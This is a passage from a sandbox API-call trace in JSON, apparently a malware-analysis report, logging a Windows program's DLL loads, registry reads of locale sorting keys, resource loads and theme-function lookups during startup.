"system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "AnimateWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76636370" } ], "repeated": 0, "id": 567 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000000c8" }, { "name": "ValueName", "value": "000603xx" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "kernel32.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx" } ], "repeated": 0, "id": 568 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 569 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SortGetHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587eb20" } ], "repeated": 0, "id": 570 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SortCloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758797e0" } ], "repeated": 0, "id": 571 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 572 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000278" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000270" } ], "repeated": 0, "id": 573 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000278" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b380000" }, { "name": "SectionOffset", "value": "0x0019f5c4" }, { "name": "ViewSize", "value": "0x00338000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 574 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000278" } ], "repeated": 0, "id": 575 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000270" } ], "repeated": 0, "id": 576 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000270" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" } ], "repeated": 0, "id": 577 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000270" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES" } ], "repeated": 0, "id": 578 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00403eb7", "parentcaller": "0x00413d52", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000270" }, { "name": "ValueName", "value": "es" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es" } ], "repeated": 0, "id": 579 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437844", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" } ], "repeated": 0, "id": 580 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437859", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitializeFlatSB" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392ac50" } ], "repeated": 0, "id": 581 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437869", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "UninitializeFlatSB" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392a9f0" } ], "repeated": 0, "id": 582 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437879", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_GetScrollProp" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392c760" } ], "repeated": 0, "id": 583 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437889", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_SetScrollProp" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392d980" } ], "repeated": 0, "id": 584 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437899", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_EnableScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392cc70" } ], "repeated": 0, "id": 585 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x004378ba", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_ShowScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392ca30" } ], "repeated": 0, "id": 586 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x004378db", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_GetScrollRange" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392c8c0" } ], "repeated": 0, "id": 587 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x004378fc", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_GetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392c950" } ], "repeated": 0, "id": 588 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0043791d", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_GetScrollPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392c700" } ], "repeated": 0, "id": 589 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0043793e", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_SetScrollPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392d730" } ], "repeated": 0, "id": 590 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0043795f", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_SetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392d8b0" } ], "repeated": 0, "id": 591 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437980", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "FlatSB_SetScrollRange" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392d7c0" } ], "repeated": 0, "id": 592 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00437517", "parentcaller": "0x00404b23", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "WndProcPtr0040000000001DD0" }, { "name": "Atom", "value": "0x0000c083" } ], "repeated": 0, "id": 593 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00463ccb", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "User32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 594 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00463cdc", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetLayeredWindowAttributes" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652e50" } ], "repeated": 0, "id": 595 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x004055db", "parentcaller": "0x00404b23", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76e1d000" }, { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 596 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x004055db", "parentcaller": "0x00404b23", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76e1d000" }, { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 597 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 2, "id": 598 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00414abb", "parentcaller": "0x00414c7a", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x004a5b80", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#10" }, { "name": "Name", "value": "T__1222821643" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 1, "id": 599 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00417f02", "parentcaller": "0x00417e0e", "category": "misc", "api": "LoadResource", "status": true, "return": "0x004d4830", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b80" } ], "repeated": 0, "id": 600 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00417f1c", "parentcaller": "0x00417e0e", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x00011b4a", "arguments": [ { "name": "ModuleHandle", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b80" } ], "repeated": 0, "id": 601 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00417f26", "parentcaller": "0x00417e0e", "category": "misc", "api": "LockResource", "status": true, "return": "0x004d4830", "arguments": [ { "name": "ResourceData", "value": "0x004d4830" } ], "repeated": 0, "id": 602 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 1, "id": 603 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428a3b", "parentcaller": "0x00437d54", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "uxtheme.dll" }, { "name": "BaseAddress", "value": "0x74e80000" } ], "repeated": 0, "id": 604 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428a53", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "OpenThemeData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eac980" } ], "repeated": 0, "id": 605 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428a65", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "CloseThemeData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eadc30" } ], "repeated": 0, "id": 606 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428a77", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "DrawThemeBackground" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ea73b0" } ], "repeated": 0, "id": 607 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428a89", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "DrawThemeText" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ea6880" } ], "repeated": 0, "id": 608 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428a9b", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeBackgroundContentRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ea7cf0" } ], "repeated": 1, "id": 609 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428abf", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemePartSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eadd70" } ], "repeated": 0, "id": 610 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428ad1", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeTextExtent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eadcc0" } ], "repeated": 0, "id": 611 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428ae3", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeTextMetrics" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eb62c0" } ], "repeated": 0, "id": 612 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428af5", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeBackgroundRegion" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ea86f0" } ], "repeated": 0, "id": 613 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b07", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "HitTestThemeBackground" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed9070" } ], "repeated": 0, "id": 614 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b19", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "DrawThemeEdge" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed7990" } ], "repeated": 0, "id": 615 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b2b", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "DrawThemeIcon" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed7a30" } ], "repeated": 0, "id": 616 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b3d", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "IsThemePartDefined" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ead5f0" } ], "repeated": 0, "id": 617 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b4f", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "IsThemeBackgroundPartiallyTransparent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ead9c0" } ], "repeated": 0, "id": 618 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b61", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eacc50" } ], "repeated": 0, "id": 619 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b73", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeMetric" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8810" } ], "repeated": 0, "id": 620 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b85", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeString" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8990" } ], "repeated": 0, "id": 621 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428b97", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeBool" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eacba0" } ], "repeated": 0, "id": 622 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428ba9", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeInt" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eacc50" } ], "repeated": 0, "id": 623 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428bbb", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeEnumValue" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed86c0" } ], "repeated": 0, "id": 624 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428bcd", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemePosition" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eab670" } ], "repeated": 0, "id": 625 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428bdf", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeFont" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ea8250" } ], "repeated": 0, "id": 626 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428bf1", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed88b0" } ], "repeated": 0, "id": 627 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c03", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { 